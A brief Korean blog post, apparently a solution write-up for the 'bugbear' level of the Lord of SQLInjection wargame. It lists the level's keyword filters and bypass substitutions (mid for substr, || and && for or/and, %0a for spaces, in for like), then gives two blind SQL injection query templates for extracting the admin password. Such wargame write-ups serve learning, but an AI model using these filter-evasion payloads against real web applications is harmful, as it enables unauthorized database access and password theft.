-
[Lord of SQLInjection] #13 bugbear[+] Security [+]/Lord of SQLInjection 2020. 5. 4. 02:45
13번째 몬스터 버그베어!
코드를 살펴보니 substr ascii = or and 공백 0x 아주 이전까지 쓰였던 모든 함수들을 필터링해 막아 놓았다.
하지만
substr => mid 로 대체
or => ||
and => &&
공백 => %0a
like => in
' => "
다 빠져나갈 구멍이 있다!
구글링해서 우회기법들을 조금만 찾아봐도 어렵지 않게 풀 수 있을 것 같다!
좋아 이제 코드를 작성해보자.
?no=1%0a||%0aid%0ain%0a("admin")%0a%26%26%0alength(pw)>{} 이 쿼리를 사용하여 비밀번호를 알아내고
?no=1||id%0ain%0a("admin")%26%26mid(pw,{},1)%0ain%0a("'.format(j)+arr[i]+'")')
위와 같이 쿼리를 작성하여 Blind SQL Injection 하였다.
벌레곰 컷!
'[+] Security [+] > Lord of SQLInjection' 카테고리의 다른 글
[Lord of SQLInjection] #15 assassin (0) 2020.05.04 [Lord of SQLInjection] #14 giant (0) 2020.05.04 [Lord of SQLInjection] #12 darkknight (0) 2020.05.03 [Lord of SQLInjection] #11 golem (0) 2020.05.03 [Lord of SQLInjection] #10 skeleton (0) 2020.05.03